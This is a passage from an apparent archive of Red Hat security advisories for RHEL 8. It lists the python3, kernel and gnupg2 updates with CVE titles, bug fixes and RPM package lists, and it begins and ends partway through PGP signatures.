iQIVAwUBYyCB39zjgjWX9erEAQhxWw/+KSmwOTYjC11C1DDOcN3gyX3jVPdq04pL  
SEeobwoattaVo7kvVHRMFncpWiqrGY4j2V7vEFUh0ejKF8PxSVBYwxB+NfNmD2V3  
l8XEaFGq0/l8GHBFEc2IqAP4wmXhECxE3nI2eaOBm0FYlQIHnw9vmvck0uxelZQ5  
MoNLPMmq5X3tD6E8bbJvg0JbkemcQF8Q6tfKlAHIsvsc4cthCNcTPa8gyN1uXH+0  
pEG5MMxRC+06lTStqQVKbbyVSDmHoaQBjXhNo9NROlgkvqwLAhrWZzDMLs/4d7fS  
3Cy/p80vWpVg56M3oPIY4OMfMgNwrLwfLqCJWFA0IcdYhffClzorMiCs85MteWQA  
zYZoaKFOf0m38TD1yTOtjcXoHrtbLfXsnQFu5R08SyBCj7ppI1IUE8rCHvNtDnCp  
CQke/GAHoNeFBppAsfseDkOndutSipImmygGhX05QI5gvRC3/Cz/nAvZX9TpNia5  
SlVsO8w9XJIvtbcLjOkHBjFuGpZ71bHNBOqveRkfuE6q3W6TXKpqhTlkipdrb41L  
6nuJKNm89/Hi++5RKmv6YJRDfLr86K9StCBtrvEqgV9XTt6ppwEI/0uzbVFhPtVi  
i1dh8XruZEtAMUqUToc3jj4gGZgn9deXfNgZxp1phVMjKq1CRpG965xCM3yE9iPV  
4jmxeiFCqp0=  
=YJLI  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6450-01

Red Hat Security Advisory 2022-6457-01 - Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: python3 security update  
Advisory ID:       RHSA-2022:6457-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6457  
Issue date:        2022-09-13  
CVE Names:         CVE-2015-20107 CVE-2022-0391   
=====================================================================

1. Summary:

An update for python3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Python is an interpreted, interactive, object-oriented programming  
language, which includes modules, classes, exceptions, very high level  
dynamic data types and dynamic typing. Python supports interfaces to many  
system calls and libraries, as well as to various windowing systems.

Security Fix(es):

* python(mailcap): findmatch() function does not sanitise the second  
argument (CVE-2015-20107)

* python: urllib.parse does not sanitize URLs containing ASCII newline and  
tabs (CVE-2022-0391)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2047376 - CVE-2022-0391 python: urllib.parse does not sanitize URLs containing ASCII newline and tabs  
2075390 - CVE-2015-20107 python(mailcap): findmatch() function does not sanitise the second argument

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
platform-python-debug-3.6.8-47.el8_6.aarch64.rpm  
platform-python-devel-3.6.8-47.el8_6.aarch64.rpm  
python3-debuginfo-3.6.8-47.el8_6.aarch64.rpm  
python3-debugsource-3.6.8-47.el8_6.aarch64.rpm  
python3-idle-3.6.8-47.el8_6.aarch64.rpm  
python3-tkinter-3.6.8-47.el8_6.aarch64.rpm

ppc64le:  
platform-python-debug-3.6.8-47.el8_6.ppc64le.rpm  
platform-python-devel-3.6.8-47.el8_6.ppc64le.rpm  
python3-debuginfo-3.6.8-47.el8_6.ppc64le.rpm  
python3-debugsource-3.6.8-47.el8_6.ppc64le.rpm  
python3-idle-3.6.8-47.el8_6.ppc64le.rpm  
python3-tkinter-3.6.8-47.el8_6.ppc64le.rpm

s390x:  
platform-python-debug-3.6.8-47.el8_6.s390x.rpm  
platform-python-devel-3.6.8-47.el8_6.s390x.rpm  
python3-debuginfo-3.6.8-47.el8_6.s390x.rpm  
python3-debugsource-3.6.8-47.el8_6.s390x.rpm  
python3-idle-3.6.8-47.el8_6.s390x.rpm  
python3-tkinter-3.6.8-47.el8_6.s390x.rpm

x86_64:  
platform-python-3.6.8-47.el8_6.i686.rpm  
platform-python-debug-3.6.8-47.el8_6.i686.rpm  
platform-python-debug-3.6.8-47.el8_6.x86_64.rpm  
platform-python-devel-3.6.8-47.el8_6.i686.rpm  
platform-python-devel-3.6.8-47.el8_6.x86_64.rpm  
python3-debuginfo-3.6.8-47.el8_6.i686.rpm  
python3-debuginfo-3.6.8-47.el8_6.x86_64.rpm  
python3-debugsource-3.6.8-47.el8_6.i686.rpm  
python3-debugsource-3.6.8-47.el8_6.x86_64.rpm  
python3-idle-3.6.8-47.el8_6.i686.rpm  
python3-idle-3.6.8-47.el8_6.x86_64.rpm  
python3-test-3.6.8-47.el8_6.i686.rpm  
python3-tkinter-3.6.8-47.el8_6.i686.rpm  
python3-tkinter-3.6.8-47.el8_6.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
python3-3.6.8-47.el8_6.src.rpm

aarch64:  
platform-python-3.6.8-47.el8_6.aarch64.rpm  
python3-debuginfo-3.6.8-47.el8_6.aarch64.rpm  
python3-debugsource-3.6.8-47.el8_6.aarch64.rpm  
python3-libs-3.6.8-47.el8_6.aarch64.rpm  
python3-test-3.6.8-47.el8_6.aarch64.rpm

ppc64le:  
platform-python-3.6.8-47.el8_6.ppc64le.rpm  
python3-debuginfo-3.6.8-47.el8_6.ppc64le.rpm  
python3-debugsource-3.6.8-47.el8_6.ppc64le.rpm  
python3-libs-3.6.8-47.el8_6.ppc64le.rpm  
python3-test-3.6.8-47.el8_6.ppc64le.rpm

s390x:  
platform-python-3.6.8-47.el8_6.s390x.rpm  
python3-debuginfo-3.6.8-47.el8_6.s390x.rpm  
python3-debugsource-3.6.8-47.el8_6.s390x.rpm  
python3-libs-3.6.8-47.el8_6.s390x.rpm  
python3-test-3.6.8-47.el8_6.s390x.rpm

x86_64:  
platform-python-3.6.8-47.el8_6.x86_64.rpm  
python3-debuginfo-3.6.8-47.el8_6.i686.rpm  
python3-debuginfo-3.6.8-47.el8_6.x86_64.rpm  
python3-debugsource-3.6.8-47.el8_6.i686.rpm  
python3-debugsource-3.6.8-47.el8_6.x86_64.rpm  
python3-libs-3.6.8-47.el8_6.i686.rpm  
python3-libs-3.6.8-47.el8_6.x86_64.rpm  
python3-test-3.6.8-47.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2015-20107  
https://access.redhat.com/security/cve/CVE-2022-0391  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCB2dzjgjWX9erEAQiWxxAAlWeTdVBVug0zEnEMtfv2MLICwPpP0Bfq  
fxU516CJG+wHVGuSglzEaYS/vTXHzUTDzCFLqayDImBgUTJavmK8oua7Ih7/sgc+  
zziu8+it5NBGvQRu9Tz23TSteE97AD2UeOKmBBU9SXkXmn6sJEfU899Q8dL+6xKT  
pnzRxc/eaOP85EwRRHUVegS10A3FD+kFbDMHc59GnEnQcRwSK50EGnj+Gauh3AL1  
dVXKfsplBm/wG/CR/3Ytv0yMoPdA+r9+inizhgCeYmc2DsyTGPPtZfkIiqEju4Hq  
ZB4ywxBUR3lp1o9Y1ZDfiA0iGqOiGn/SbjYXYoHNTQVMXDGwdThdzhiegGOa0iEj  
u7/SIH+trMmdbgnR9FpDQO7cjtn0PFykjb2uNHyssA24qvuFVKDsvqibpboEyYVM  
41B5zYvJsei9P4f4QR8Ep9mrScKBwvQ0Bdc8fC0pUhcRe24g8gxZEnh/ReYOOCnv  
qL1xlgUePljUjhvH3N0WuQTS+Hd0cVdtxDzMlAvjWccioNWF4byvi7HuXnePfsof  
3nd604G0SipeKa8WKXuoTk0xsd9r3/9Fjv45VjGdSGWabO3CF5lQfcca8gEf9chv  
2PJTZvaFldJQ1tv+mm7U4KzwUn3J7k4/p+aR1jDVbyXbDU9OGRtMD66r5SIufM4n  
qechXtE5LLM=  
=guoV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6457-01

Red Hat Security Advisory 2022-6460-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: kernel security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6460-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6460  
Issue date:        2022-09-13  
CVE Names:         CVE-2022-21123 CVE-2022-21125 CVE-2022-21166   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* Incomplete cleanup of multi-core shared buffers (aka SBDR)  
(CVE-2022-21123)

* Incomplete cleanup of microarchitectural fill buffers (aka SBDS)  
(CVE-2022-21125)

* Incomplete cleanup in specific special register write operations (aka  
DRPW) (CVE-2022-21166)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Bad page state in process qemu-kvm  pfn:68a74600 (BZ#2081013)

* slub corruption during  LPM of hnv interface (BZ#2081250)

* Affinity broken due to vector space exhaustion (BZ#2084646)

* 'rmmod pmt_telemetry' panics on ADL-P IOTG (BZ#2091079)

* Unable to boot RHEL-8.6 on Brazos max. config (Install is success)  
(BZ#2092241)

* kernel crash after reboot of T14/G2 AMD laptop (mt7921e module)  
(BZ#2095654)

* mt7921: free resources on pci_probe error path (BZ#2101684)

* NLM should be more defensive if underlying FS changes fl_owner  
(BZ#2102099)

* RHEL8/async-pf Guest call trace when reboot after postcopy migration with  
high stress workload (BZ#2105340)

* execve exit tracepoint not called (BZ#2106662)

* QProcess dead lock on kernel-4.18.0-358 (BZ#2107643)

* KVM fix guest FPU uABI size to kvm_xsave (BZ#2107652)

* KVM selftests fail to compile (BZ#2107655)

* Some monitor have no display with AMD W6400 when boot into OS.  
(BZ#2109826)

* Percpu counter usage is gradually getting increasing during podman  
container recreation. (BZ#2110039)

* multipath failed to recover after EEH hit on flavafish adapter on  
Denali(qla2xxx/flavafish/RHEL8.6/Denali) (BZ#2110768)

* soft lockups under heavy I/O load to ahci connected SSDs (BZ#2110772)

* trouble re-assigning MACs to VFs, ice stricter than other drivers  
(BZ#2111936)

* Intel MPI 2019.0 - mpirun stuck on latest kernel (BZ#2112030)

* Multicast packets are not received by all VFs on the same port even  
though they have the same VLAN (BZ#2117026)

* Hyper-V 2019 Dynamic Memory Problem hv_balloon (BZ#2117050)

* kernel BUG at kernel/sched/deadline.c:1561! (BZ#2117410)

* ALSA (sound) driver - update Intel SOF kcontrol code (BZ#2117732)

* bridge over bond over ice ports has no connection (BZ#2118580)

* Fix max VLANs available for VF (BZ#2118581)

* offline selftest failed (BZ#2118582)

* INTEL NVMUpdate utility ver 3.20 is failing to update firmware on  
E810-XXVDA4T (WPC) (BZ#2118583)

* VM configured with failover interface will coredump after been migrating  
from source host to target host(only iavf driver) (BZ#2118705)

* Fix max VLANs available for untrusted VF (BZ#2118707)

* Softlockup on infinite loop in task_get_css() for a CSS_DYING cpuset  
(BZ#2120776)

Enhancement(s):

* KVM Sapphire Rapids (SPR) AMX Instructions (BZ#2088287)

* KVM Sapphire Rapids (SPR) AMX Instructions part2 (BZ#2088288)

* ice: Driver Update (BZ#2102359)

* iavf: Driver Update (BZ#2102360)

* iommu/vt-d: Make DMAR_UNITS_SUPPORTED a config setting (BZ#2112983)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2090237 - CVE-2022-21123 hw: cpu: Incomplete cleanup of multi-core shared buffers (aka SBDR)  
2090240 - CVE-2022-21125 hw: cpu: Incomplete cleanup of microarchitectural fill buffers (aka SBDS)  
2090241 - CVE-2022-21166 hw: cpu: Incomplete cleanup in specific special register write operations (aka DRPW)

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kernel-4.18.0-372.26.1.el8_6.src.rpm

aarch64:  
bpftool-4.18.0-372.26.1.el8_6.aarch64.rpm  
bpftool-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-core-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-cross-headers-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-debug-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-debug-core-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-debug-devel-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-debug-modules-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-devel-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-headers-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-modules-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-modules-extra-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-tools-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-tools-libs-4.18.0-372.26.1.el8_6.aarch64.rpm  
perf-4.18.0-372.26.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm  
python3-perf-4.18.0-372.26.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-372.26.1.el8_6.noarch.rpm  
kernel-doc-4.18.0-372.26.1.el8_6.noarch.rpm

ppc64le:  
bpftool-4.18.0-372.26.1.el8_6.ppc64le.rpm  
bpftool-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-core-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-cross-headers-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-debug-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-debug-core-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-debug-devel-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-debug-modules-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-devel-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-headers-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-modules-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-modules-extra-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-tools-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-tools-libs-4.18.0-372.26.1.el8_6.ppc64le.rpm  
perf-4.18.0-372.26.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm  
python3-perf-4.18.0-372.26.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm

s390x:  
bpftool-4.18.0-372.26.1.el8_6.s390x.rpm  
bpftool-debuginfo-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-core-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-cross-headers-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-debug-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-debug-core-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-debug-debuginfo-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-debug-devel-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-debug-modules-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-debug-modules-extra-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-debuginfo-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-devel-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-headers-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-modules-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-modules-extra-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-tools-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-tools-debuginfo-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-zfcpdump-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-zfcpdump-core-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-372.26.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-372.26.1.el8_6.s390x.rpm  
perf-4.18.0-372.26.1.el8_6.s390x.rpm  
perf-debuginfo-4.18.0-372.26.1.el8_6.s390x.rpm  
python3-perf-4.18.0-372.26.1.el8_6.s390x.rpm  
python3-perf-debuginfo-4.18.0-372.26.1.el8_6.s390x.rpm

x86_64:  
bpftool-4.18.0-372.26.1.el8_6.x86_64.rpm  
bpftool-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-core-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-cross-headers-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-debug-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-debug-core-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-debug-devel-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-debug-modules-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-devel-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-headers-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-modules-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-modules-extra-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-tools-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-tools-libs-4.18.0-372.26.1.el8_6.x86_64.rpm  
perf-4.18.0-372.26.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm  
python3-perf-4.18.0-372.26.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
bpftool-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-372.26.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.26.1.el8_6.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-372.26.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.26.1.el8_6.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-372.26.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.26.1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21123  
https://access.redhat.com/security/cve/CVE-2022-21125  
https://access.redhat.com/security/cve/CVE-2022-21166  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCB1NzjgjWX9erEAQjx1g/+KpIc2rESQgtzICCW50Ha+ZjaOZiuIgGV  
1wDzgsyj7JRxGOIhGY3edJp7sdtoT0+CoWTdjENZrNhQlQ9UhRSpJ+8vdGy5WooO  
fwwKBffteRMEl8YTO/U8fstclEKXK3MB93ZxEHgS0L3UQY/AUU5XqSzB4a4rV9RJ  
DpFQcnw3dHIrtMKHs4HMrm8+Q8ezq9UmVbl472ecnfmNXfHDhOmUGGlUrT22SX9p  
Zn/UXCiWZxIt+Vh2uTrIgs4hiSJPAqD/lGHjLQpaR26uciZnndLui2s4W91F7yN4  
ZifRDwrSAMtsRoln7Z8HL6H59tw4vHwAY1rD5ATwk9EqhRtaetE+v0hzM+BRBhri  
dpZnKUhMiUDNTUKqmpbBZjh4IuSKI6AkaQenFnMQWTp027B6o0EjhqpiEdLaA0R/  
pYewm2OKbulyoUeVhC5GOMX6g8ckGa5h2o4Fr+fkaptELQN1VniYEu88O7pRqaqR  
lW3MrcYIEowDxyiMLehgtIxjyawzfmi0fficXzCf8xEXm8fmqlrXu4lfhKV4g3WI  
Y9j8INFYc4inopUBsQM1zXWV00nCDxAvaYPhOYI0VjO11jxOCOcBheOlwS1sseOv  
Bjram7oqf2DuVSINeTAgbHMLMA4AGEcNMsOAN/mwdq6ZBpEYmCf48pvZwQscW7qv  
a685GRAjoyY=  
=4AwP  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6460-01

Red Hat Security Advisory 2022-6463-01 - The GNU Privacy Guard is a tool for encrypting data and creating digital signatures, compliant with OpenPGP and S/MIME standards. Issues addressed include a spoofing vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: gnupg2 security update  
Advisory ID:       RHSA-2022:6463-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6463  
Issue date:        2022-09-13  
CVE Names:         CVE-2022-34903   
=====================================================================

1. Summary:

An update for gnupg2 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The GNU Privacy Guard (GnuPG or GPG) is a tool for encrypting data and  
creating digital signatures, compliant with OpenPGP and S/MIME standards.

Security Fix(es):

* gpg: Signature spoofing via status line injection (CVE-2022-34903)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2102868 - CVE-2022-34903 gpg: Signature spoofing via status line injection

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
gnupg2-2.2.20-3.el8_6.src.rpm

aarch64:  
gnupg2-2.2.20-3.el8_6.aarch64.rpm  
gnupg2-debuginfo-2.2.20-3.el8_6.aarch64.rpm  
gnupg2-debugsource-2.2.20-3.el8_6.aarch64.rpm  
gnupg2-smime-2.2.20-3.el8_6.aarch64.rpm  
gnupg2-smime-debuginfo-2.2.20-3.el8_6.aarch64.rpm

ppc64le:  
gnupg2-2.2.20-3.el8_6.ppc64le.rpm  
gnupg2-debuginfo-2.2.20-3.el8_6.ppc64le.rpm  
gnupg2-debugsource-2.2.20-3.el8_6.ppc64le.rpm  
gnupg2-smime-2.2.20-3.el8_6.ppc64le.rpm  
gnupg2-smime-debuginfo-2.2.20-3.el8_6.ppc64le.rpm

s390x:  
gnupg2-2.2.20-3.el8_6.s390x.rpm  
gnupg2-debuginfo-2.2.20-3.el8_6.s390x.rpm  
gnupg2-debugsource-2.2.20-3.el8_6.s390x.rpm  
gnupg2-smime-2.2.20-3.el8_6.s390x.rpm  
gnupg2-smime-debuginfo-2.2.20-3.el8_6.s390x.rpm

x86_64:  
gnupg2-2.2.20-3.el8_6.x86_64.rpm  
gnupg2-debuginfo-2.2.20-3.el8_6.x86_64.rpm  
gnupg2-debugsource-2.2.20-3.el8_6.x86_64.rpm  
gnupg2-smime-2.2.20-3.el8_6.x86_64.rpm  
gnupg2-smime-debuginfo-2.2.20-3.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCBytzjgjWX9erEAQhBhg/+KSNEvBY3M8glyU/at+t3haHSa0Ap6wtb  
y51Ua4fZ6rpA02TISCldKooeCOwvi5i66hwBT3ConquMSGm2RnKGOsifz7eWpl04  
C+VcLu2R7w+egdw+smnzJmt4g/0SqIRFn/OTC8bIgM1bx4CzpZRqjlkWSUqiR6/T  
8vf5yTClfwRc52Nt2lK1LNxX93AdPhI6rg9D9TgVt1nzshLDbRxIhoIgBKQyoeav  
YA0s8wtivise5QMH+occGIDBKk/fiiV/43dDRTnVpsrN7TzMOOMo2/9nSI7tdio4  
+dNhuu41Ls0bi2kNNPa6IWePrs0lcscwp2IXY04y+XZH0seucWzsEYh7JbSUfvCQ  
tLjuRrWRtiSI3rc3G1FgRb56zqcikeareekYB7pOixxbjJM0JEoCe89w8ELA5S0R  
7oW4EmMSgw9Xc7ytddqmK6aqit7JL3RZpSEAe2nY27+XsyVp8/P58mFz7/9cH0tF  
AdQFJfEMfHaWncTaY8m1LNS+03F72bsfZHwURuyKWOrwZa5CoM7pD20MSZuDNhJF  
TzJ/ZCJvyGkIiyLFl7tLWKLoXgsLi2iuyWKwP3QgCsoBYdx963BV5UVeslZjCvOp  
